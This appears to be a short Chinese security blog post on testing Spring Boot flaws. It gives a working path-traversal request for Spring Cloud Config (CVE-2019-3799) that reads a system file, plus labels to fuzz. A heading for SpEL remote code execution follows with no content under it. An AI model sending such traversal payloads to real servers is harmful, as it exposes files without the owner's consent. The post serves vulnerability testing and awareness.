微慑信息网

spring boot相关漏洞测试

1.spring cloud config 跨目录文件读取(CVE-2019-3799):

 

参考:

spring cloud config任意文件读取测试

测试环境下载:https://github.com/spring-cloud/spring-cloud-config/releases?after=v1.4.7.RELEASE

根据官方文档,可以通过如下请求GET /{name}/{profile}/{label}/{path} 来获取配置文件,name,profile和label的含义与常规环境下的endpoint相同,而path是指文件名。

 

http://127.0.0.1:8888/admin/env/master/..%252f..%252f..%252f..%252f..%252f..%252fWindows%252Fwin.ini

如果label不存在则会提示如下:

>No such label: env

或者:

Cannot load environment

 

fuzz出来lable:

test、master、head等

MSF测试:

 

参考https://www.xd10086.com/posts/1808713361549490810/

2、远程代码执行SpEL RCE

 

赞(0) 打赏
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » spring boot相关漏洞测试

评论 抢沙发

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

觉得文章有用就打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册